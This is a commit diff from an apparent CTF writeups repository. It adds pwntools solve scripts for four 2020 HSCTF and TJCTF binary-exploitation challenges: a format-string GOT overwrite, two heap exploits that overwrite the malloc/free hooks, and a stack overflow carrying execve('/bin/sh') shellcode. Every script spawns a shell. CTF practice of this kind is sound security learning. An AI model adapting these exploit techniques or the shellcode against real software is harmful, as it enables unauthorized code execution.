solve scripts

Author: joshdabosh

README.md

@@ -1,34 +1,6 @@
 # writeups
 
-This is where I store writeups for CTF challenges that I've either solved, helped solve, or wrote.
+This is where I store writeups / solve scripts for CTF I've done.
 
 [generate.py](generate.py) is some quick code I threw together to provide some structure to writeups. Use at your own risk.
 
-## 2020
-[AngstromCTF](2020-AngstromCTF)
-
-[DawgCTF](2020-DawgCTF)
-
-[HackTM](2020-HackTM)
-
-[HouseplantCTF](2020-HouseplantCTF)
-
-[MidnightSunCTF](2020-MidnightSunCTF)
-
-[NeverLanCTF](2020-NeverLanCTF)
-
-[TAMUCTF](2020-TAMUCTF)
-
-[VirtualCodeCup](2020-VirtualCodeCup)
-
-[Zh3r0 PreCTF](2020-Zh3r0PreCTF)
-
-[SharkyCTF](2020-SharkyCTF)
-
-[MAGIC oCTF](2020-MAGICoCTF)
-
-[Thomas Jefferson CTF](2020-TJCTF)
-
-[High School CTF](2020-HSCTF)
-
-[Redpwn CTF](2020-RedpwnCTF)

solved_afterwards/2020-HSCTF/got_it/solve.py

@@ -0,0 +1,109 @@
+from pwn import *
+
+e = ELF("./got_it")
+
+libc = ELF("./libc.so.6")
+
+p = process("./got_it")
+
+
+#context.log_level="debug"
+gdb.attach(p, """break * main+176
+c""")
+
+main = e.sym["main"]	# 0x4012f9
+
+print("main", hex(main))
+print("exit", hex(e.got["exit"]))
+
+ret = 0x40101a
+print("ret gadget", hex(ret))
+
+signal = 0x403f90
+sleep = 0x403fc8
+
+print("sleep", hex(sleep))
+
+
+p.recvuntil("out!")
+
+# our inputs starts at offset 18
+
+exploit = "%18$hn"
+exploit += "%21$hn"
+exploit += "%{}p%19$hn".format(0x40)
+exploit += "%22$hn"
+exploit += "%{}p%23$hn".format(0x101a-0x40)
+exploit += "%{}p%20$hn".format(0x12f9-0x101a)
+
+exploit += "|%31$p|"
+
+exploit = exploit.ljust(80)
+
+exploit += p64(e.got["exit"]+4)
+exploit += p64(e.got["exit"]+2)
+exploit += p64(e.got["exit"])
+
+exploit += p64(sleep+4)
+exploit += p64(sleep+2)
+exploit += p64(sleep)
+
+exploit += "AAAA"
+
+p.sendline(exploit)
+
+p.recvuntil("|")
+
+dat = p.recv()
+
+dat = dat.split("|")
+
+libc.address = int(dat[0][2:], 16) - 0x3f3660
+
+print("libc address", hex(libc.address))
+
+p.sendline()
+p.sendline()
+
+
+og = libc.sym["system"]
+print("calling", hex(og))
+
+
+h = hex(og)[2:]
+
+high = int(h[:-8], 16)
+mid = int(h[-8:-4], 16)
+low = int(h[-4:], 16)
+
+print("high", hex(high))
+print("mid", hex(mid))
+print("low", hex(low))
+
+order = sorted([[low, e.got["__isoc99_scanf"], "low"], [mid, e.got["__isoc99_scanf"]+2, "mid"], [high, e.got["__isoc99_scanf"]+4, "high"]], key = lambda x: x[0])
+
+print([[hex(a[0]), hex(a[1]), a[2]] for a in order])
+
+exploit = ""
+
+exploit += "%{}p%18$hn%{}p%19$hn%{}p%20$hn".format(order[0][0], order[1][0]-order[0][0], order[2][0]-order[1][0])
+
+
+exploit = exploit.ljust(80)
+
+
+exploit += p64(order[0][1])
+exploit += p64(order[1][1])
+exploit += p64(order[2][1])
+
+
+
+p.sendline(exploit)
+
+p.sendline()
+p.sendline()
+
+
+p.sendline("/bin/sh")
+
+p.interactive()

solved_afterwards/2020-HSCTF/studysim/solve.py

@@ -0,0 +1,102 @@
+from pwn import *
+
+
+e = ELF("./studysim")
+
+libc = ELF("./libc.so.6")
+
+
+p = process("./studysim", env={"LD_PRELOAD":"./libc.so.6"})
+
+#context.log_level = "debug"
+
+gdb.attach(p, """break * main+182""")
+
+def add(size, data="AAAA"):
+	p.recvuntil(">")
+	p.sendline("add")
+	p.recvuntil("?")
+	p.sendline(str(size))
+	p.recvuntil("?")
+	p.sendline(data)
+	print("added")
+
+def do(amt):
+	p.recvuntil(">")
+	p.sendline("do")
+	p.recvuntil("?")
+	p.sendline(str(amt))
+	print("did")
+
+
+stdout_var = 0x404020
+stack_var = 0x404060
+allocated_var = 0x404040
+
+do(4)
+add(8)
+do(0)
+
+p.recvline()
+first_chunk = int(p.recvline().split()[5])
+
+#print("first chunk", hex(first_chunk))
+
+heap_base = first_chunk-0x261
+print("heap base", hex(heap_base))
+
+do(first_chunk)		# reset
+
+# now i want to write to heap_base + 0x60
+
+allocated_curr = int(-(-stack_var + heap_base+0x60)/8)
+
+do(allocated_curr)
+
+add(48, p64(stdout_var))
+
+do(-allocated_curr+1)	# reset
+
+p.interactive()
+
+add(48)
+
+add(48, "")
+
+
+p.recvline()
+
+dat = p.recvline().split("'")
+print("dat", dat)
+
+libc_leak = u64(dat[1].ljust(8, "\x00"))
+libc.address = libc_leak - 0x1e5760
+
+print("libc address", hex(libc.address))
+print("malloc hook", hex(libc.sym["__malloc_hook"]))
+
+do(2)	# reset
+
+# write to freelist again
+
+allocated_curr = int(-(-stack_var + heap_base+0x68)/8)
+print("allocated curr", hex(allocated_curr))
+do(allocated_curr)
+
+add(69, p64(libc.sym["__malloc_hook"]))
+
+do(-allocated_curr+1)
+
+
+og = 0xe2383
+og = libc.address+og
+
+print("og", hex(og))
+
+add(69)
+add(69, p64(og))
+
+p.sendlineafter(">", "add")
+p.sendlineafter("?", "0")		# satisfies [rdx]==NULL b/c read_ulong reads a `0` into rdx
+
+p.interactive()

solved_afterwards/2020-HSCTF/treecache1/solve.py

@@ -0,0 +1,95 @@
+from pwn import *
+
+e = ELF("./trees1")
+
+libc = ELF("./libc.so.6")
+
+p = process("./trees1")
+
+#context.log_level="debug"
+gdb.attach(p)#, """break * main+302""")
+
+
+def create():
+	print("create")
+	p.sendlineafter(">", "1")
+	p.recvuntil("ID ")
+	return int(p.recvuntil(",")[:-1])
+
+
+def delete(idx):
+	print("delete")
+	p.sendlineafter(">", "2")
+	p.sendlineafter(">", str(idx))
+
+
+def edit(idx, name, d_len, d, amt):
+	p.sendlineafter(">", "3")
+	p.sendlineafter(">", str(idx))
+	p.sendlineafter(".", name)
+	p.sendlineafter(">", str(d_len))
+	p.sendlineafter(".", d)
+	p.sendlineafter(">", str(amt))
+
+
+def show(idx):
+	p.sendlineafter(">", "4")
+	p.sendlineafter(">", str(idx))
+
+
+# leak heap + libc by freeing a chunk into unsorted and then UAF
+# delete even chunk, read odd chunk
+
+# fill tcache
+for i in range(7):
+	create()
+
+	edit(i+1, "AAAABBBBCCCCDDD", 0xf0, "BBBBEEEEFFFFGGGGHHHH", i+1)
+
+
+create()	# 8
+edit(8, "A", 0xf0, "B", 8)
+
+create()	# 9, prevent consolidation w/ top
+
+
+for i in range(7):
+	delete(i+1)
+
+
+delete(8)
+
+
+for i in range(9):	# ends on chunk 18.
+	# have to take 7 from tcache, 1 from fastbins,
+	# then the last one (chunk 18) will be from unsorted bin and have libc pointers
+	create()
+
+
+show(18)
+
+# parse leaked libc
+dat = p.recvline().strip().split()[0]
+libc.address = int(dat) - 0x1e4d90
+print("libc address", hex(libc.address))
+print("libc system", hex(libc.sym["system"]))
+print("libc free hook", hex(libc.sym["__free_hook"]))
+
+
+create()	# 19
+create()	# 20
+create()	# 21
+
+delete(20)
+edit(21, p64(libc.sym["__free_hook"]), 0x69, "BBBB", 21)
+
+create()	# 22
+create()	# 23
+
+edit(23, p64(libc.sym["system"]), 0x20, "BBBB", 23)
+
+
+edit(19, "/bin/sh", 2, "A", 19)
+delete(19)
+
+p.interactive()

solved_afterwards/2020-TJCTF/elprimo/solve.py

@@ -0,0 +1,28 @@
+from pwn import *
+
+e = ELF("./el_primo")
+
+p = process("./el_primo")
+
+
+context.log_level="debug"
+gdb.attach(p, '''pie break * 0x6a8''')
+
+p.recvline()
+
+dat = p.recvline()
+
+stackleak = int(dat.split()[-1][2:], 16)
+
+print("stack leak", hex(stackleak))
+print("stack leak+64", hex(stackleak+64))
+
+exploit = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
+
+exploit += "\x00"*(32-len(exploit)) + p32(stackleak+40) + p32(stackleak)
+
+#print("exploit", exploit)
+
+p.sendline(exploit)
+
+p.interactive()